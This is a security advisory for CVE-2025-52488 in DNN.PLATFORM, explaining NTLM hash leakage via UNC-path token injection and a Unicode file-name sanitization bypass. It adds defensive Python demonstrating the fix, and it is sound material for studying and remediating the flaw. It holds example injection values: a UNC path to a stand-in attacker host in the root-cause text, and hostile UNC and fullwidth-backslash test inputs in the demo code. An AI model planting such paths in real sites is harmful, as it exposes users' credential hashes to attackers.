CVE-2025-52488: DNN.PLATFORM leaks NTLM hash via SMB Share Interaction with malicious user input
Severity: 8.6
Basic Information
Technical Details
Package Name | Ecosystem | Vulnerable Versions | First Patched Version
---|---|---|---
DNN.PLATFORM | nuget | >= 6.0.0, < 10.0.1 | 10.0.1
Vulnerability Intelligence
Miggo AI
Root Cause Analysis
The vulnerability is a high-severity information disclosure issue that allows an attacker to steal NTLM hashes from users of a vulnerable DNN.PLATFORM instance. The root cause of the vulnerability is twofold:
- Lack of output encoding in token replacement: The primary issue lies in the token replacement system. Multiple components throughout the platform use this system to insert dynamic values into content. Before the patch, the output of these tokens was not encoded by default. This allowed an attacker to inject a UNC path (e.g., `\\attacker.com\resource.jpg`) as the value of a token. When this token is rendered in a context that resolves URLs (such as an `<img>` tag's `src` attribute), the user's browser will attempt to authenticate with the attacker's SMB server, thereby leaking the NTLM hash of the user's Windows account.
- Improper file name sanitization: A second vector for this attack exists in the file upload functionality of the CKEditor provider. The file name sanitization logic could be bypassed by using specific Unicode characters in the file name. These characters were converted to path separators (`\`) only after the sanitization check had run, allowing an attacker to create a file whose name is a UNC path. When this file is accessed, the same NTLM hash leakage occurs.
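The ordering defect in the second vector is a general canonicalization-before-validation bug, so it is worth seeing in isolation. The Python below is an added illustration, not DNN's own CKEditor provider code: `clean_file_name` is a constructed toy sanitizer, and NFKC normalisation of fullwidth characters (U+FF3C FULLWIDTH REVERSE SOLIDUS folds to `\`) is used as a stand-in for whatever conversion the provider applied, since the advisory does not name the characters. `vulnerable_order` models the pre-patch pipeline (clean, then fold) and `fixed_order` the patched one (fold, then clean).

```python
import re
import unicodedata

# Constructed toy sanitizer standing in for the CKEditor provider's
# file-name cleaning. It strips path separators and reserved characters.
_FORBIDDEN = re.compile(r'[\\/:*?"<>|]')


def clean_file_name(name: str) -> str:
    """Remove path separators and reserved characters from a file name."""
    return _FORBIDDEN.sub("", name)


def fold_unicode(name: str) -> str:
    """Unicode compatibility normalisation (NFKC), used here as an assumed
    stand-in for the provider's character conversion. Fullwidth forms such
    as U+FF3C fold to their ASCII counterparts, so a name that contained no
    separator before this step may contain '\\' afterwards."""
    return unicodedata.normalize("NFKC", name)


def vulnerable_order(name: str) -> str:
    """Pre-patch pipeline: clean first, then fold. The fold re-introduces
    separators the cleaner never saw."""
    return fold_unicode(clean_file_name(name))


def fixed_order(name: str) -> str:
    """Patched pipeline: fold first, then clean, so folded separators are
    visible to (and removed by) the cleaner."""
    return clean_file_name(fold_unicode(name))


def contains_path_separator(name: str) -> bool:
    """Post-condition a file store should enforce independently of the
    sanitizer: a stored name must never carry a separator."""
    return "\\" in name or "/" in name


if __name__ == "__main__":
    # Constructed input: fullwidth reverse solidus in place of '\'.
    sample = "\uff3c\uff3cshare\uff3cpicture.jpg"
    print(repr(vulnerable_order(sample)))  # '\\\\share\\picture.jpg'
    print(repr(fixed_order(sample)))       # 'sharepicture.jpg'
```

The `contains_path_separator` post-condition is the cheap defence-in-depth check: whatever the sanitizer does, refusing to persist any name that still contains a separator after all transformations catches this class of ordering mistake.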
The patch addresses these issues by:
- Introducing a new method `AddPropertySource` in the base token replacement class. This method wraps property sources in an HTML encoder by default, thus neutralizing the UNC path injection in the token replacement system.
- Fixing the file name sanitization logic by performing the Unicode character conversion before the cleaning, ensuring that any malicious characters are caught.
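To make the encode-by-default design concrete, here is an added Python model of a token replacer with an `add_property_source` method that wraps every source in an HTML-encoding decorator unless the caller opts out. This is illustrative code, not DNN's `TokenReplace` or its real `AddPropertySource` signature; the `[Source:Property]` token syntax, the `encode` opt-out flag, and the `is_same_site_path` helper are assumptions made for the example. The helper is there because HTML encoding stops a value from adding markup but leaves backslashes untouched, so a token that is placed directly inside a URL attribute still needs a URL allow-list check.

```python
import html
import re
from typing import Dict, Protocol

# Constructed model of a "[Source:Property]" token syntax.
TOKEN = re.compile(r"\[(?P<source>\w+):(?P<prop>\w+)\]")


class PropertyAccess(Protocol):
    def get_property(self, name: str) -> str: ...


class DictPropertySource:
    """Serves token values from a dict (stands in for a user-profile object)."""

    def __init__(self, values: Dict[str, str]) -> None:
        self._values = values

    def get_property(self, name: str) -> str:
        return self._values.get(name, "")


class HtmlEncodingPropertySource:
    """Decorator that HTML-encodes every value the inner source returns, so a
    user-controlled value can never contribute tags or attributes."""

    def __init__(self, inner: PropertyAccess) -> None:
        self._inner = inner

    def get_property(self, name: str) -> str:
        return html.escape(self._inner.get_property(name), quote=True)


class TokenReplace:
    """Encode-by-default registry (hypothetical model of the patched design):
    sources are wrapped unless the caller explicitly passes encode=False."""

    def __init__(self) -> None:
        self._sources: Dict[str, PropertyAccess] = {}

    def add_property_source(self, key: str, source: PropertyAccess,
                            encode: bool = True) -> None:
        self._sources[key.lower()] = (
            HtmlEncodingPropertySource(source) if encode else source
        )

    def replace(self, template: str) -> str:
        def substitute(match: "re.Match[str]") -> str:
            source = self._sources.get(match.group("source").lower())
            if source is None:
                return match.group(0)  # unknown token is left untouched
            return source.get_property(match.group("prop"))
        return TOKEN.sub(substitute, template)


def is_same_site_path(value: str) -> bool:
    """Allow-list check for a value destined for a URL attribute: only a
    site-relative path is accepted; UNC paths (leading backslashes),
    protocol-relative URLs ("//host") and anything with a scheme are rejected."""
    return (
        value.startswith("/")
        and not value.startswith("//")
        and "\\" not in value
        and ":" not in value
    )


def render_profile(display_name: str, photo_path: str) -> str:
    """Render a profile card from user-controlled fields (constructed data)."""
    replacer = TokenReplace()
    replacer.add_property_source("user", DictPropertySource({
        "DisplayName": display_name,
        "Photo": photo_path if is_same_site_path(photo_path) else "/images/default.png",
    }))
    return replacer.replace(
        '<p>Welcome, [User:DisplayName]</p><img src="[User:Photo]">'
    )


if __name__ == "__main__":
    print(render_profile("alice", "/portals/0/alice.jpg"))
    # Constructed hostile values: markup in a name, UNC path as a photo path.
    print(render_profile('<img src="\\\\unc-host.example\\x.jpg">', "/a.jpg"))
    print(render_profile("bob", "\\\\unc-host.example\\x.jpg"))
```

The two layers complement each other: the encoding wrapper guarantees that no token can introduce an element or attribute, and the path check guarantees that a token already sitting inside `src` can only point at the site's own origin. Registering a source with `encode=False` should be the rare, reviewed exception.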
As a security engineer, you should be aware that any part of the DNN site that uses token replacement to display user-controllable data could have been a potential vector for this attack. The file upload functionality, especially in rich text editors, was another key entry point. The patch effectively mitigates these risks.
Vulnerable functions
- DotNetNuke.Services.Tokens.TokenReplace.TokenReplace (DNN Platform/Library/Services/Tokens/TokenReplace.cs)
- DotNetNuke.Services.Tokens.HtmlTokenReplace.HtmlTokenReplace (DNN Platform/Library/Services/Tokens/HtmlTokenReplace.cs)
- DotNetNuke.UI.Modules.Html5.Html5ModuleTokenReplace.Html5ModuleTokenReplace (DNN Platform/Library/UI/Modules/Html5/Html5ModuleTokenReplace.cs)
- DNNConnect.CKE.Browser.UploadFile (DNN Platform/Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/Browser.aspx.cs)
- DNNConnect.CKE.FileUploader.UploadWholeFile (DNN Platform/Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx.cs)
- DotNetNuke.Modules.Journal.Components.JournalItemTokenReplace.JournalItemTokenReplace (DNN Platform/Modules/Journal/Components/JournalItemTokenReplace.cs)